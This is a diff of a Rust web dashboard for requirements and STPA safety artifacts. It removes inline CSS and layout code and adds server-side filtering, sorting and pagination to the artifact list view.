1rem;border-radius:var(--radius-sm); - background:var(--surface);border:1px solid var(--border);margin-bottom:1.25rem;font-size:.9rem;font-weight:600} -.diff-summary-item{display:flex;align-items:center;gap:.35rem} -.diff-old{color:#c62828;text-decoration:line-through;font-size:.85rem} -.diff-new{color:#15713a;font-size:.85rem} 
-.diff-arrow{color:var(--text-secondary);margin:0 .25rem;font-size:.8rem} -details.diff-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); - display:flex;align-items:center;gap:.5rem;transition:background var(--transition)} -details.diff-row>summary::-webkit-details-marker{display:none} -details.diff-row>summary:hover{background:rgba(58,134,255,.04)} -details.diff-row[open]>summary{background:rgba(184,134,11,.06);border-bottom-color:var(--border)} -details.diff-row>.diff-detail{padding:.75rem 1.25rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border);font-size:.88rem} -.diff-field{padding:.3rem 0;display:flex;align-items:baseline;gap:.5rem} -.diff-field-name{font-weight:600;font-size:.8rem;color:var(--text-secondary);min-width:100px; - text-transform:uppercase;letter-spacing:.03em} - -/* ── Detail actions ──────────────────────────────────────────── */ -.detail-actions{display:flex;gap:.75rem;align-items:center;margin-top:1rem} -.btn{display:inline-flex;align-items:center;gap:.4rem;padding:.45rem 1rem;border-radius:var(--radius-sm); - font-size:.85rem;font-weight:600;font-family:var(--font);text-decoration:none; - transition:all var(--transition);cursor:pointer;border:none} -.btn-primary{background:var(--accent);color:#fff;box-shadow:0 1px 2px rgba(0,0,0,.08)} -.btn-primary:hover{background:var(--accent-hover);transform:translateY(-1px);color:#fff;text-decoration:none} -.btn-secondary{background:transparent;color:var(--text-secondary);border:1px solid var(--border)} -.btn-secondary:hover{background:rgba(0,0,0,.03);color:var(--text);text-decoration:none} - -/* ── Graph ────────────────────────────────────────────────────── */ -.graph-container{border-radius:var(--radius);overflow:hidden;background:#fafbfc;cursor:grab; - height:calc(100vh - 280px);min-height:400px;position:relative;border:1px solid var(--border)} -.graph-container:active{cursor:grabbing} -.graph-container 
svg{display:block;width:100%;height:100%;position:absolute;top:0;left:0} -.graph-controls{position:absolute;top:.75rem;right:.75rem;display:flex;flex-direction:column;gap:.35rem;z-index:10} -.graph-controls button{width:34px;height:34px;border:1px solid var(--border);border-radius:var(--radius-sm); - background:var(--surface);font-size:1rem;cursor:pointer;display:flex;align-items:center; - justify-content:center;box-shadow:var(--shadow);color:var(--text); - transition:all var(--transition)} -.graph-controls button:hover{background:#f0f0f3;box-shadow:var(--shadow-md)} -.graph-controls button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} -.graph-legend{display:flex;flex-wrap:wrap;gap:.75rem;padding:.75rem 0 .25rem;font-size:.82rem} -.graph-legend-item{display:flex;align-items:center;gap:.35rem;color:var(--text-secondary)} -.graph-legend-swatch{width:12px;height:12px;border-radius:3px;flex-shrink:0} - -/* ── Filter grid ──────────────────────────────────────────────── */ -.filter-grid{display:flex;flex-wrap:wrap;gap:.6rem;margin-bottom:.75rem} -.filter-grid label{font-size:.8rem;display:flex;align-items:center;gap:.3rem; - color:var(--text-secondary);cursor:pointer;padding:.2rem .45rem; - border-radius:4px;transition:background var(--transition); - text-transform:none;letter-spacing:0;font-weight:500} -.filter-grid label:hover{background:rgba(58,134,255,.06)} -.filter-grid input[type="checkbox"]{margin:0;accent-color:var(--accent);width:14px;height:14px; - cursor:pointer;border-radius:3px} - -/* ── Document styles ──────────────────────────────────────────── */ -.doc-body{line-height:1.8;font-size:.95rem} -.doc-body h1{font-size:1.4rem;font-weight:700;margin:2rem 0 .75rem;color:var(--text); - border-bottom:2px solid var(--border);padding-bottom:.5rem} -.doc-body h2{font-size:1.2rem;font-weight:600;margin:1.5rem 0 .5rem;color:var(--text)} -.doc-body h3{font-size:1.05rem;font-weight:600;margin:1.25rem 0 .4rem;color:var(--text-secondary)} -.doc-body 
p{margin:.5rem 0} -.doc-body ul{margin:.5rem 0 .5rem 1.5rem} -.doc-body li{margin:.2rem 0} -.doc-body img{border-radius:6px;margin:.75rem 0;box-shadow:0 2px 8px rgba(0,0,0,.1)} -.doc-body pre.mermaid{background:transparent;border:1px solid var(--border);border-radius:6px;padding:1rem;text-align:center} -.artifact-ref{display:inline-flex;align-items:center;padding:.15rem .5rem;border-radius:5px; - font-size:.8rem;font-weight:600;font-family:var(--mono);background:#edf2ff; - color:#3a63c7;cursor:pointer;text-decoration:none; - border:1px solid #d4def5;transition:all var(--transition)} -.artifact-ref:hover{background:#d4def5;text-decoration:none;transform:translateY(-1px);box-shadow:0 2px 4px rgba(0,0,0,.06)} -.artifact-ref.broken{background:#fde8e8;color:#c62828;border-color:#f4c7c3;cursor:default} -.artifact-ref.broken:hover{transform:none;box-shadow:none} -/* ── Artifact hover preview ────────────────────────────────── */ -.art-tooltip{position:absolute;z-index:1000;pointer-events:none; - background:var(--surface);border:1px solid var(--border);border-radius:var(--radius); - box-shadow:var(--shadow-lg);padding:0;max-width:340px;min-width:220px; - opacity:0;transition:opacity 120ms ease-in} -.art-tooltip.visible{opacity:1;pointer-events:auto} -.art-preview{padding:.75rem .85rem;font-size:.82rem;line-height:1.45} -.art-preview-header{display:flex;align-items:center;gap:.4rem;margin-bottom:.3rem} -.art-preview-title{font-weight:600;font-size:.85rem;margin-bottom:.3rem;color:var(--text)} -.art-preview-desc{color:var(--text-secondary);font-size:.78rem;line-height:1.4;margin-top:.3rem; - display:-webkit-box;-webkit-line-clamp:3;-webkit-box-orient:vertical;overflow:hidden} -.art-preview-links{font-size:.72rem;color:var(--text-secondary);margin-top:.35rem;font-family:var(--mono)} -.art-preview-tags{margin-top:.35rem;display:flex;flex-wrap:wrap;gap:.25rem} -.art-preview-tag{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; - 
background:rgba(58,134,255,.08);color:var(--accent);font-family:var(--mono)} -.doc-glossary{font-size:.9rem} -.doc-glossary dt{font-weight:600;color:var(--text)} -.doc-glossary dd{margin:0 0 .5rem 1rem;color:var(--text-secondary)} -.doc-toc{font-size:.88rem;background:var(--surface);border:1px solid var(--border); - border-radius:var(--radius);padding:1rem 1.25rem;margin-bottom:1.25rem; - box-shadow:var(--shadow)} -.doc-toc strong{font-size:.75rem;text-transform:uppercase;letter-spacing:.05em;color:var(--text-secondary)} -.doc-toc ul{list-style:none;margin:.5rem 0 0;padding:0} -.doc-toc li{margin:.2rem 0;color:var(--text-secondary)} -.doc-toc .toc-h2{padding-left:0} -.doc-toc .toc-h3{padding-left:1.25rem} -.doc-toc .toc-h4{padding-left:2.5rem} -.doc-meta{display:flex;gap:.75rem;flex-wrap:wrap;align-items:center;margin-bottom:1.25rem} - -/* ── Source viewer ────────────────────────────────────────────── */ -.source-tree{font-family:var(--mono);font-size:.85rem;line-height:1.8} -.source-tree ul{list-style:none;margin:0;padding:0} -.source-tree li{margin:0} -.source-tree .tree-item{display:flex;align-items:center;gap:.4rem;padding:.2rem .5rem;border-radius:var(--radius-sm); - transition:background var(--transition);color:var(--text)} -.source-tree .tree-item:hover{background:rgba(58,134,255,.06);text-decoration:none} -.source-tree .tree-icon{display:inline-flex;width:1rem;height:1rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.55} -.source-tree .indent{display:inline-block;width:1.25rem;flex-shrink:0} -.source-viewer{font-family:var(--mono);font-size:.82rem;line-height:1.7;overflow-x:auto; - background:#fafbfc;border:1px solid var(--border);border-radius:var(--radius);padding:0} -.source-viewer table{width:100%;border-collapse:collapse;margin:0} -.source-viewer table td{padding:0;border:none;vertical-align:top} -.source-viewer table tr:hover{background:rgba(58,134,255,.04)} -.source-line{display:table-row} -.source-line 
.line-no{display:table-cell;width:3.5rem;min-width:3.5rem;padding:.05rem .75rem .05rem .5rem; - text-align:right;color:#b0b0b8;user-select:none;border-right:1px solid var(--border);background:#f5f5f7} -.source-line .line-content{display:table-cell;padding:.05rem .75rem;white-space:pre;tab-size:4} -.source-line-highlight{background:rgba(58,134,255,.08) !important} -.source-line-highlight .line-no{background:rgba(58,134,255,.12);color:var(--accent);font-weight:600} -.source-line:target{background:rgba(255,210,50,.18) !important} -.source-line:target .line-no{background:rgba(255,210,50,.25);color:#9a6700;font-weight:700} -.source-line .line-no a{color:inherit;text-decoration:none} -.source-line .line-no a:hover{color:var(--accent);text-decoration:underline} -/* ── Syntax highlighting tokens ─────────────────────────────── */ -.hl-key{color:#0550ae}.hl-str{color:#0a3069}.hl-num{color:#0550ae} -.hl-bool{color:#cf222e;font-weight:600}.hl-null{color:#cf222e;font-style:italic} -.hl-comment{color:#6e7781;font-style:italic}.hl-tag{color:#6639ba} -.hl-anchor{color:#953800}.hl-type{color:#8250df}.hl-kw{color:#cf222e;font-weight:600} -.hl-fn{color:#8250df}.hl-macro{color:#0550ae;font-weight:600} -.hl-attr{color:#116329}.hl-punct{color:#6e7781} -.hl-sh-cmd{color:#0550ae;font-weight:600}.hl-sh-flag{color:#953800} -.hl-sh-pipe{color:#cf222e;font-weight:700} -.source-ref-link{color:var(--accent);text-decoration:none;font-family:var(--mono);font-size:.85em} -.source-ref-link:hover{text-decoration:underline} -.source-breadcrumb{display:flex;align-items:center;gap:.4rem;font-size:.85rem;color:var(--text-secondary); - margin-bottom:1rem;flex-wrap:wrap} -.source-breadcrumb a{color:var(--accent);font-weight:500} -.source-breadcrumb .sep{opacity:.35;margin:0 .1rem} -.source-meta{display:flex;gap:1.5rem;font-size:.8rem;color:var(--text-secondary);margin-bottom:1rem} -.source-meta .meta-item{display:flex;align-items:center;gap:.35rem} -.source-refs{margin-top:1.25rem} -.source-refs 
h3{font-size:.95rem;margin-bottom:.5rem} - -/* ── STPA tree ───────────────────────────────────────────────── */ -.stpa-tree{margin-top:1.25rem} -.stpa-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} -.stpa-node{display:flex;align-items:center;gap:.5rem;padding:.35rem 0;font-size:.9rem} -.stpa-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} -.stpa-link-label{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; - font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; - margin-right:.35rem;white-space:nowrap} -details.stpa-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); - display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.9rem} -details.stpa-details>summary::-webkit-details-marker{display:none} -details.stpa-details>summary:hover{background:rgba(58,134,255,.04)} -details.stpa-details>summary .stpa-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} -details.stpa-details[open]>summary .stpa-chevron{transform:rotate(90deg)} -.stpa-uca-table{width:100%;border-collapse:collapse;font-size:.88rem;margin-top:.75rem} -.stpa-uca-table th{font-weight:600;font-size:.72rem;text-transform:uppercase;letter-spacing:.04em; - color:var(--text-secondary);padding:.5rem .75rem;border-bottom:2px solid var(--border)} -.stpa-uca-table td{padding:.55rem .75rem;border-bottom:1px solid var(--border);vertical-align:top} -.stpa-uca-table tbody tr:hover{background:rgba(58,134,255,.04)} -.uca-type-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600;white-space:nowrap} -.uca-type-not-providing{background:#fee;color:#c62828} -.uca-type-providing{background:#fff3e0;color:#e65100} -.uca-type-too-early-too-late{background:#e8f4fd;color:#0c5a82} -.uca-type-stopped-too-soon{background:#f3e5f5;color:#6a1b9a} - -/* 
── Traceability explorer ──────────────────────────────────────── */ -.trace-matrix{border-collapse:collapse;font-size:.8rem;margin-bottom:1.5rem;width:100%} -.trace-matrix th{font-weight:600;font-size:.7rem;text-transform:uppercase;letter-spacing:.04em; - color:var(--text-secondary);padding:.45rem .6rem;border-bottom:2px solid var(--border);white-space:nowrap} -.trace-matrix td{padding:.35rem .6rem;border-bottom:1px solid var(--border);text-align:center} -.trace-matrix td:first-child{text-align:left;font-family:var(--mono);font-size:.78rem;font-weight:500} -.trace-matrix tbody tr:hover{background:rgba(58,134,255,.04)} -.trace-cell{display:inline-flex;align-items:center;justify-content:center;width:28px;height:22px; - border-radius:4px;font-size:.75rem;font-weight:700;font-variant-numeric:tabular-nums} -.trace-cell-ok{background:rgba(21,113,58,.1);color:#15713a} -.trace-cell-gap{background:rgba(198,40,40,.1);color:#c62828} -.trace-tree{margin-top:1rem} -.trace-node{display:flex;align-items:center;gap:.5rem;padding:.4rem .6rem;border-radius:var(--radius-sm); - transition:background var(--transition);font-size:.88rem} -.trace-node:hover{background:rgba(58,134,255,.04)} -.trace-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} -.trace-edge{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; - font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; - margin-right:.35rem;white-space:nowrap} -.trace-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} -details.trace-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); - display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.88rem} -details.trace-details>summary::-webkit-details-marker{display:none} -details.trace-details>summary:hover{background:rgba(58,134,255,.04)} -details.trace-details>summary .trace-chevron{transition:transform 
var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} -details.trace-details[open]>summary .trace-chevron{transform:rotate(90deg)} -.trace-history{margin:.35rem 0 .5rem 1.5rem;padding:.5rem .75rem;background:rgba(0,0,0,.015); - border-radius:var(--radius-sm);border:1px solid var(--border);font-size:.8rem} -.trace-history-title{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.04em; - color:var(--text-secondary);margin-bottom:.35rem} -.trace-history-item{display:flex;align-items:baseline;gap:.5rem;padding:.15rem 0;color:var(--text-secondary)} -.trace-history-item code{font-size:.75rem;color:var(--accent);font-weight:500} -.trace-history-item .hist-date{font-size:.72rem;color:var(--text-secondary);opacity:.7;min-width:70px} -.trace-history-item .hist-msg{font-size:.78rem;color:var(--text);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} -.trace-status{display:inline-flex;padding:.12rem .4rem;border-radius:4px;font-size:.68rem;font-weight:600; - margin-left:.25rem} -.trace-status-approved{background:rgba(21,113,58,.1);color:#15713a} -.trace-status-draft{background:rgba(184,134,11,.1);color:#b8860b} - -/* ── Artifact embedding in docs ────────────────────────────────── */ -.artifact-embed{margin:.75rem 0;padding:.75rem 1rem;background:var(--card-bg);border:1px solid var(--border); - border-radius:var(--radius);border-left:3px solid var(--accent)} -.artifact-embed-header{display:flex;align-items:center;gap:.5rem;margin-bottom:.35rem} -.artifact-embed-header .artifact-ref{font-family:var(--mono);font-size:.85rem;font-weight:600} -.artifact-embed-title{font-weight:600;font-size:.92rem;color:var(--text)} -.artifact-embed-desc{font-size:.82rem;color:var(--text-secondary);margin-top:.25rem;line-height:1.5} - -/* ── Diagram in artifact detail ────────────────────────────────── */ -.artifact-diagram{margin:1rem 0} -.artifact-diagram .mermaid{background:var(--card-bg);padding:1rem;border-radius:var(--radius); - border:1px solid 
var(--border)} - -/* ── AADL SVG style overrides (match etch) ────────────────────── */ -.aadl-viewport svg text{font-family:system-ui,-apple-system,BlinkMacSystemFont,sans-serif !important; - font-size:12px !important} -.aadl-viewport svg rect,.aadl-viewport svg polygon{rx:6;ry:6} -.aadl-viewport svg .node rect{stroke-width:1.5px;filter:drop-shadow(0 1px 3px rgba(0,0,0,.1))} -.aadl-viewport svg .edge path,.aadl-viewport svg .edge line{stroke:#888 !important;stroke-width:1.2px} -.aadl-viewport svg .edge polygon{fill:#888 !important;stroke:#888 !important} - -/* ── Scrollbar (subtle) ───────────────────────────────────────── */ -::-webkit-scrollbar{width:6px;height:6px} -::-webkit-scrollbar-track{background:transparent} -::-webkit-scrollbar-thumb{background:#c5c5cd;border-radius:3px} -::-webkit-scrollbar-thumb:hover{background:#a0a0aa} - -/* ── Selection ────────────────────────────────────────────────── */ -::selection{background:rgba(58,134,255,.18)} - -/* ── Cmd+K search modal ──────────────────────────────────────── */ -.cmd-k-overlay{position:fixed;inset:0;background:rgba(0,0,0,.55);backdrop-filter:blur(4px); - z-index:10000;display:none;align-items:flex-start;justify-content:center;padding-top:min(20vh,160px)} -.cmd-k-overlay.open{display:flex} -.cmd-k-modal{background:var(--sidebar);border-radius:12px;width:100%;max-width:600px; - box-shadow:0 16px 70px rgba(0,0,0,.35);border:1px solid rgba(255,255,255,.08); - overflow:hidden;display:flex;flex-direction:column;max-height:min(70vh,520px)} -.cmd-k-input{width:100%;padding:.875rem 1rem .875rem 2.75rem;font-size:1rem;font-family:var(--font); - background:transparent;border:none;border-bottom:1px solid rgba(255,255,255,.08); - color:#fff;outline:none;caret-color:var(--accent)} -.cmd-k-input::placeholder{color:rgba(255,255,255,.35)} -.cmd-k-icon{position:absolute;left:1rem;top:.95rem;color:rgba(255,255,255,.35);pointer-events:none; - font-size:.95rem} -.cmd-k-head{position:relative} 
-.cmd-k-results{overflow-y:auto;padding:.5rem 0;flex:1} -.cmd-k-empty{padding:1.5rem 1rem;text-align:center;color:rgba(255,255,255,.35);font-size:.9rem} -.cmd-k-group{padding:0 .5rem} -.cmd-k-group-label{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.06em; - color:rgba(255,255,255,.3);padding:.5rem .625rem .25rem} -.cmd-k-item{display:flex;align-items:center;gap:.75rem;padding:.5rem .625rem;border-radius:var(--radius-sm); - cursor:pointer;color:var(--sidebar-text);font-size:.88rem;transition:background 80ms ease} -.cmd-k-item:hover,.cmd-k-item.active{background:rgba(255,255,255,.08);color:#fff} -.cmd-k-item-icon{width:1.5rem;height:1.5rem;border-radius:4px;display:flex;align-items:center; - justify-content:center;font-size:.7rem;flex-shrink:0;background:rgba(255,255,255,.06);color:rgba(255,255,255,.5)} -.cmd-k-item-body{flex:1;min-width:0} -.cmd-k-item-title{font-weight:500;white-space:nowrap;overflow:hidden;text-overflow:ellipsis} -.cmd-k-item-title mark{background:transparent;color:var(--accent);font-weight:700} -.cmd-k-item-meta{font-size:.75rem;color:rgba(255,255,255,.35);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} -.cmd-k-item-meta mark{background:transparent;color:var(--accent);font-weight:600} -.cmd-k-item-field{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; - background:rgba(255,255,255,.06);color:rgba(255,255,255,.4);white-space:nowrap;flex-shrink:0} -.cmd-k-kbd{display:inline-flex;align-items:center;gap:.2rem;font-size:.7rem;font-family:var(--mono); - padding:.15rem .4rem;border-radius:4px;background:rgba(255,255,255,.08);color:rgba(255,255,255,.4); - border:1px solid rgba(255,255,255,.06)} -.nav-search-hint{display:flex;align-items:center;justify-content:space-between;padding:.5rem .75rem; - margin-top:auto;border-top:1px solid rgba(255,255,255,.06);padding-top:1rem; - color:var(--sidebar-text);font-size:.82rem;cursor:pointer;border-radius:var(--radius-sm); - transition:all var(--transition)} 
-.nav-search-hint:hover{background:var(--sidebar-hover);color:var(--sidebar-active)} -.aadl-diagram{background:var(--card-bg);border:1px solid var(--border);border-radius:8px; - margin:1.5rem 0;overflow:hidden;position:relative} -.aadl-diagram .aadl-caption{display:flex;align-items:center;justify-content:space-between; - padding:.5rem 1rem;border-bottom:1px solid var(--border);background:var(--nav-bg); - font-size:.82rem;color:var(--text-secondary)} -.aadl-caption .aadl-title{font-weight:600;color:var(--text);font-family:var(--mono);font-size:.85rem} -.aadl-caption .aadl-badge{display:inline-block;padding:.1rem .5rem;border-radius:var(--radius-sm); - background:var(--primary);color:#fff;font-size:.72rem;font-weight:600;letter-spacing:.02em} -.aadl-controls{display:flex;gap:.25rem} -.aadl-controls button{background:var(--card-bg);border:1px solid var(--border);border-radius:var(--radius-sm); - width:1.7rem;height:1.7rem;cursor:pointer;font-size:.85rem;line-height:1;display:flex; - align-items:center;justify-content:center;color:var(--text-secondary);transition:all .15s} -.aadl-controls button:hover{background:var(--primary);color:#fff;border-color:var(--primary)} -.aadl-viewport{overflow:hidden;cursor:grab;min-height:300px;position:relative;background:var(--body-bg)} -.aadl-viewport.grabbing{cursor:grabbing} -.aadl-viewport svg{transform-origin:0 0;position:absolute;top:0;left:0} -.aadl-viewport svg .node rect,.aadl-viewport svg .node polygon,.aadl-viewport svg .node path,.aadl-viewport svg .node ellipse{filter:drop-shadow(0 1px 2px rgba(0,0,0,.08))} -.aadl-viewport svg .node text{font-family:system-ui,-apple-system,sans-serif} -.aadl-viewport svg .edge path{stroke-dasharray:none} -.aadl-loading{color:var(--text-secondary);font-style:italic;padding:2rem;text-align:center} -.aadl-error{color:var(--danger);font-style:italic;padding:1rem} -.aadl-analysis{border-top:1px solid var(--border);max-height:220px;overflow-y:auto;font-size:.78rem} 
-.aadl-analysis-header{display:flex;align-items:center;gap:.5rem;padding:.4rem 1rem; - background:var(--nav-bg);font-weight:600;font-size:.75rem;color:var(--text-secondary); - position:sticky;top:0;z-index:1;border-bottom:1px solid var(--border)} -.aadl-analysis-header .badge-count{display:inline-flex;align-items:center;justify-content:center; - min-width:1.3rem;height:1.3rem;border-radius:99px;font-size:.65rem;font-weight:700;padding:0 .3rem} -.badge-error{background:var(--danger);color:#fff} -.badge-warning{background:#e8a735;color:#fff} -.badge-info{background:var(--primary);color:#fff} -.aadl-diag{display:flex;align-items:baseline;gap:.5rem;padding:.3rem 1rem;border-bottom:1px solid var(--border)} -.aadl-diag:last-child{border-bottom:none} -.aadl-diag:hover{background:rgba(0,0,0,.03)} -.aadl-diag .sev{flex-shrink:0;font-size:.65rem;font-weight:700;text-transform:uppercase; - padding:.1rem .35rem;border-radius:var(--radius-sm);letter-spacing:.03em} -.sev-error{background:#fde8e8;color:var(--danger)} -.sev-warning{background:#fef3cd;color:#856404} -.sev-info{background:#d1ecf1;color:#0c5460} -.aadl-diag .diag-path{color:var(--text-secondary);font-family:var(--mono);font-size:.72rem;flex-shrink:0} -.aadl-diag .diag-msg{color:var(--text);flex:1} -.aadl-diag .diag-analysis{color:var(--text-secondary);font-size:.68rem;opacity:.7;flex-shrink:0} -"#; - -// ── Pan/zoom JS ────────────────────────────────────────────────────────── - -const GRAPH_JS: &str = r#" - -"#; - -// ── Cmd+K search JS ────────────────────────────────────────────────────── - -const SEARCH_JS: &str = r#" - -"#; - -// ── AADL diagram JS ───────────────────────────────────────────────────── - -const AADL_JS: &str = r#" - -"#; - -// ── Layout ─────────────────────────────────────────────────────────────── - -fn page_layout(content: &str, state: &AppState) -> Html { - let artifact_count = state.store.len(); - let diagnostics = validate::validate(&state.store, &state.schema, &state.graph); - let 
error_count = diagnostics - .iter() - .filter(|d| d.severity == Severity::Error) - .count(); - let error_badge = if error_count > 0 { - format!("{error_count}") - } else { - "OK".to_string() - }; - let doc_badge = if !state.doc_store.is_empty() { - format!("{}", state.doc_store.len()) - } else { - String::new() - }; - let result_badge = if !state.result_store.is_empty() { - format!( - "{}", - state.result_store.len() - ) - } else { - String::new() - }; - let stpa_types = [ - "loss", - "hazard", - "sub-hazard", - "system-constraint", - "controller", - "controlled-process", - "control-action", - "uca", - "controller-constraint", - "loss-scenario", - ]; - let stpa_count: usize = stpa_types - .iter() - .map(|t| state.store.count_by_type(t)) - .sum(); - let stpa_nav = if stpa_count > 0 { - format!( - "
  • STPA{stpa_count}
  • " - ) - } else { - String::new() - }; - let version = env!("CARGO_PKG_VERSION"); - - // Context bar - let ctx = &state.context; - let git_html = if let Some(ref git) = ctx.git { - let status = if git.is_dirty { - format!( - "{} uncommitted", - git.dirty_count - ) - } else { - "clean".to_string() - }; - format!( - "/\ - {branch}@{commit}\ - {status}", - branch = html_escape(&git.branch), - commit = html_escape(&git.commit_short), - ) - } else { - String::new() - }; - // Project switcher: show siblings as a dropdown if available - let switcher_html = if ctx.siblings.is_empty() { - String::new() - } else { - let mut s = String::from( - "\ -
    \ - \ -
    ", - ); - for sib in &ctx.siblings { - s.push_str(&format!( - "
    \ - {}\ - rivet -p {} serve -P {}\ -
    ", - html_escape(&sib.name), - html_escape(&sib.rel_path), - ctx.port, - )); - } - s.push_str("
    "); - s - }; - let context_bar = format!( - "
    \ - {project}{switcher_html}\ - /\ - {path}\ - {git_html}\ - Loaded {loaded_at}\ - \ -
    ", - project = html_escape(&ctx.project_name), - path = html_escape(&ctx.project_path), - loaded_at = html_escape(&ctx.loaded_at), - ); - Html(format!( - r##" - - - - -Rivet Dashboard - - - - - - - - -
    -
    - -
    -{context_bar} -
    -{content} - -
    -
    -
    -
    -
    -
    - 🔍 - -
    -
    -
    Type to search artifacts and documents
    -
    -
    -
    -{GRAPH_JS} -{SEARCH_JS} -{AADL_JS} - -"## - )) -} - -// ── Routes ─────────────────────────────────────────────────────────────── - -async fn index(State(state): State) -> Html { +use super::layout::page_layout; +use super::{ + AppState, SharedState, badge_for_type, html_escape, linkify_source_refs, rewrite_image_paths, + type_color_map, +}; +pub(crate) async fn index(State(state): State) -> Html { let state = state.read().await; let inner = stats_partial(&state); page_layout(&inner, &state) } -async fn stats_view(State(state): State) -> Html { +pub(crate) async fn stats_view(State(state): State) -> Html { let state = state.read().await; Html(stats_partial(&state)) } @@ -2755,70 +289,153 @@ fn stats_partial(state: &AppState) -> String { // ── Artifacts ──────────────────────────────────────────────────────────── -async fn artifacts_list(State(state): State) -> Html { +pub(crate) async fn artifacts_list( + State(state): State, + Query(params): Query, +) -> Html { let state = state.read().await; let store = &state.store; - let mut artifacts: Vec<_> = store.iter().collect(); - artifacts.sort_by(|a, b| a.id.cmp(&b.id)); + // Collect all unique types and statuses for filter bar controls + let mut available_types: Vec = store.types().map(|t| t.to_string()).collect(); + available_types.sort(); - let mut html = String::from("

    Artifacts

    "); - // Client-side filter input - html.push_str("
    \ - \ - \ -
    "); - html.push_str( - "
    ", - ); + let mut available_statuses: Vec = { + let mut seen = std::collections::BTreeSet::new(); + for a in store.iter() { + if let Some(s) = &a.status { + seen.insert(s.clone()); + } + } + seen.into_iter().collect() + }; + available_statuses.sort(); - for a in &artifacts { - let status = a.status.as_deref().unwrap_or("-"); - let status_badge = match status { - "approved" => format!("{status}"), - "draft" => format!("{status}"), - "obsolete" => format!("{status}"), - _ => format!("{status}"), + // Collect and apply filters + let active_types = params.type_list(); + let active_status = params.status.as_deref().unwrap_or(""); + let search_q = params.q.as_deref().unwrap_or("").to_lowercase(); + + let mut artifacts: Vec<_> = store + .iter() + .filter(|a| { + // Type filter + if !active_types.is_empty() && !active_types.contains(&a.artifact_type) { + return false; + } + // Status filter + if !active_status.is_empty() { + let art_status = a.status.as_deref().unwrap_or(""); + if art_status != active_status { + return false; + } + } + // Text search on ID and title + if !search_q.is_empty() { + let id_lower = a.id.to_lowercase(); + let title_lower = a.title.to_lowercase(); + if !id_lower.contains(&search_q) && !title_lower.contains(&search_q) { + return false; + } + } + true + }) + .collect(); + + // Apply sorting + let sort_col = params.sort.as_deref().unwrap_or("id"); + let ascending = params.sort_ascending(); + artifacts.sort_by(|a, b| { + let ord = match sort_col { + "type" => a.artifact_type.cmp(&b.artifact_type), + "title" => a.title.cmp(&b.title), + "status" => { + let sa = a.status.as_deref().unwrap_or(""); + let sb = b.status.as_deref().unwrap_or(""); + sa.cmp(sb) + } + "links" => a.links.len().cmp(&b.links.len()), + _ => a.id.cmp(&b.id), }; - html.push_str(&format!( - "\ - \ - \ - \ - ", - html_escape(&a.id), - html_escape(&a.id), - badge_for_type(&a.artifact_type), - html_escape(&a.title), - status_badge, - a.links.len() - )); - } + if ascending { ord } 
else { ord.reverse() } + }); - html.push_str("
    IDTypeTitleStatusLinks
    {}{}{}{}{}
    "); - html.push_str(&format!( - "

    {} artifacts total

    ", - artifacts.len() - )); - // Inline filter script - html.push_str( - "", - ); + // Pagination + let (page_items, total_filtered) = paginate(&artifacts, ¶ms); + + // Build table rows + let rows: Vec> = page_items + .iter() + .map(|a| { + let status = a.status.as_deref().unwrap_or("-"); + let status_badge = match status { + "approved" => format!("{status}"), + "draft" => format!("{status}"), + "obsolete" => format!("{status}"), + _ => format!("{status}"), + }; + vec![ + format!( + "{}", + html_escape(&a.id), + html_escape(&a.id) + ), + badge_for_type(&a.artifact_type), + html_escape(&a.title), + status_badge, + a.links.len().to_string(), + ] + }) + .collect(); + + let columns = vec![ + Column { + key: "id".into(), + label: "ID".into(), + sortable: true, + }, + Column { + key: "type".into(), + label: "Type".into(), + sortable: true, + }, + Column { + key: "title".into(), + label: "Title".into(), + sortable: true, + }, + Column { + key: "status".into(), + label: "Status".into(), + sortable: true, + }, + Column { + key: "links".into(), + label: "Links".into(), + sortable: true, + }, + ]; + + let mut html = String::from("

    Artifacts

    "); + html.push_str(&filter_bar(&FilterBarConfig { + base_url: "/artifacts", + available_types: &available_types, + available_statuses: &available_statuses, + params: ¶ms, + })); + html.push_str(&sortable_table(&TableConfig { + base_url: "/artifacts", + columns: &columns, + rows: &rows, + params: ¶ms, + })); + html.push_str(&pagination(total_filtered, ¶ms, "/artifacts")); Html(html) } /// Compact preview tooltip for an artifact — loaded on hover. -async fn artifact_preview( +pub(crate) async fn artifact_preview( State(state): State, Path(id): Path, ) -> Html { @@ -2885,7 +502,10 @@ async fn artifact_preview( Html(html) } -async fn artifact_detail(State(state): State, Path(id): Path) -> Html { +pub(crate) async fn artifact_detail( + State(state): State, + Path(id): Path, +) -> Html { let state = state.read().await; let store = &state.store; let graph = &state.graph; @@ -3041,12 +661,14 @@ async fn artifact_detail(State(state): State, Path(id): Path, link_types: Option, #[serde(default = "default_depth")] depth: usize, focus: Option, + /// Maximum number of nodes before the layout bails out. Default 300, max 1000. + budget: Option, } fn default_depth() -> usize { @@ -3054,7 +676,7 @@ fn default_depth() -> usize { } /// Build a filtered subgraph based on query params and return SVG. -async fn graph_view( +pub(crate) async fn graph_view( State(state): State, Query(params): Query, 